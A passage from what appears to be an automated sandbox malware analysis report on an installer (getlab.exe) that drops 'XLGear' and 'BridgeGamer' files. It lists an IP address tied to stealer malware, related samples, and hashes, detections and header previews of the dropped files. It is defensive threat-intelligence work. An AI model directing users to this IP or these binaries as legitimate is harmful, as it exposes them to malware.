                                                    • 89.105.201.183
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                    • 89.105.201.183

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\ProgramData\BridgeGamer\sqlite3.dllfile.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                        file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                            OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                              IrAr85Qv7X.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                8BQ2v9glrG.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                  BBiIn5gqhd.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                    gacut_837143941.exeGet hashmaliciousUnknownBrowse
                                                                      WTsvUl9X8N.exeGet hashmaliciousOski Stealer, VidarBrowse

                                                                        Created / dropped Files

                                                                        C:\ProgramData\BridgeGamer\BridgeGamer.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3397185
                                                                        Entropy (8bit):6.501949315581084
                                                                        Encrypted:false
                                                                        SSDEEP:49152:jcpp64wB/nwOGSXpzopPdJTp19zxJwBv1g58fR:jSp61nRx5zopPdJTT9zxmw58fR
                                                                        MD5:9DC53D054BB2482253850DA5D8DFF405
                                                                        SHA1:F6E82BED4CA68946DC87B172D9E9AB51AB38084A
                                                                        SHA-256:07D66DC4FF91DA57222F880EFEF718EDE491777EA387EE09D3E26B2CAAB7DDB2
                                                                        SHA-512:249A4782254286B6A0D999720FB62DCCA616AC21BD5267377514940C22FB5D1F20F12FA9E00577258DDD5EF7B782D945716A1C118BB56320309C9C7A75E77441
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\BridgeGamer\BridgeGamer.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Reputation:low
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...i..L.........................................@..........................@4.......4..................................................U...........................................................................................................stum8.............................. ..`.stun8..l...........................@..@.stuo8...d...0...2..................@....rsrc....V.......V...B..............@..@.stup8...@......A>..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\BridgeGamer\sqlite3.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):645592
                                                                        Entropy (8bit):6.50414583238337
                                                                        Encrypted:false
                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: OXrZ6fj4Hq.exe, Detection: malicious, Browse
                                                                        • Filename: IrAr85Qv7X.exe, Detection: malicious, Browse
                                                                        • Filename: 8BQ2v9glrG.exe, Detection: malicious, Browse
                                                                        • Filename: BBiIn5gqhd.exe, Detection: malicious, Browse
                                                                        • Filename: gacut_837143941.exe, Detection: malicious, Browse
                                                                        • Filename: WTsvUl9X8N.exe, Detection: malicious, Browse
                                                                        Reputation:high, very likely benign file
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                        C:\ProgramData\da1127it46.dat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8
                                                                        Entropy (8bit):2.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:8C/ll:8CX
                                                                        MD5:0D0A6EA34B267869C1DD64F9AD4584C2
                                                                        SHA1:F7A99108740EEA61E2F3C46B989E18648C038E14
                                                                        SHA-256:AA7D7191AA5A80BA1BE7EE4BA60FF2EC593B8C5EF1EC0E88E5E546DF7BDD19F0
                                                                        SHA-512:7B093076A3F26D79AC8245F76A0955C621F2BDBFB35B77CAD8FA774D723C6FD4A4243321D1F2B0E71A8D5C14B4B5AB8BA1D0FEC869E180EF923C308AAA3FC2D0
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.kJg....

                                                                        C:\ProgramData\da1127rc46.dat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:xln:j
                                                                        MD5:B15762FC4C227BBDB97385765FB475F4
                                                                        SHA1:3B5022C8251B22D81FB9EC294C5197E0BDDD9BD4
                                                                        SHA-256:32434DC5B0F72C9B863C24DAA5D4E79B9C43BD73B38C469FB65FD13D996B7B32
                                                                        SHA-512:3F335DDBB7830D09C4504ED9000CC9E3BA8CC14E8252446698147C9B9F52C245C744ED5C7882A78E73D002C682CF98B9BF77D87990D392833618DBDCB20C838A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:,...

                                                                        C:\ProgramData\da1127resa.dat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):128
                                                                        Entropy (8bit):2.9545817380615236
                                                                        Encrypted:false
                                                                        SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                        MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                        SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                        SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                        SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                        Malicious:false
                                                                        Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                        C:\ProgramData\da1127resb.dat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):128
                                                                        Entropy (8bit):1.7095628900165245
                                                                        Encrypted:false
                                                                        SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                        MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                        SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                        SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                        SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                        Malicious:false
                                                                        Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_iscrypt.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2560
                                                                        Entropy (8bit):2.8818118453929262
                                                                        Encrypted:false
                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_setup64.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.215994423157539
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_shfoldr.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23312
                                                                        Entropy (8bit):4.596242908851566
                                                                        Encrypted:false
                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\getlab.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):704000
                                                                        Entropy (8bit):6.506120067282535
                                                                        Encrypted:false
                                                                        SSDEEP:12288:5/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRMh1K8xyF:dkqZ1G7DMvrP537dzHsA6hcHGbH3Euhs
                                                                        MD5:A0CFF52B882184452424B6E618FA061B
                                                                        SHA1:C3985E364276F258B06A7B0DC1B87215B8FCDD80
                                                                        SHA-256:F1EF7FD69A948204ED5F004B7621E7DE57320319A5F358ADC89FC30F0F06A953
                                                                        SHA-512:722871F86BFECD794A9E0246B87CCF5CF0F62787D50F383F6F71B565D9AA10687703A267A665C395958C44BF9975C0CF6BD8A1FC1A2D7B8F5584DD2D7D078871
                                                                        Malicious:true
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\LTDIS13n.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):265728
                                                                        Entropy (8bit):6.4472652154517345
                                                                        Encrypted:false
                                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\bjpeg23.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176128
                                                                        Entropy (8bit):6.204917493416147
                                                                        Encrypted:false
                                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\gdiplus.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1645320
                                                                        Entropy (8bit):6.787752063353702
                                                                        Encrypted:false
                                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-4GRQU.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1645320
                                                                        Entropy (8bit):6.787752063353702
                                                                        Encrypted:false
                                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-B16F3.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):265728
                                                                        Entropy (8bit):6.4472652154517345
                                                                        Encrypted:false
                                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-GH467.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):645592
                                                                        Entropy (8bit):6.50414583238337
                                                                        Encrypted:false
                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-K4GKL.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):499712
                                                                        Entropy (8bit):6.414789978441117
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-NVVDJ.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176128
                                                                        Entropy (8bit):6.204917493416147
                                                                        Encrypted:false
                                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-OHPT3.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:MS Windows HtmlHelp Data
                                                                        Category:dropped
                                                                        Size (bytes):78183
                                                                        Entropy (8bit):7.692742945771669
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                        Malicious:false
                                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet

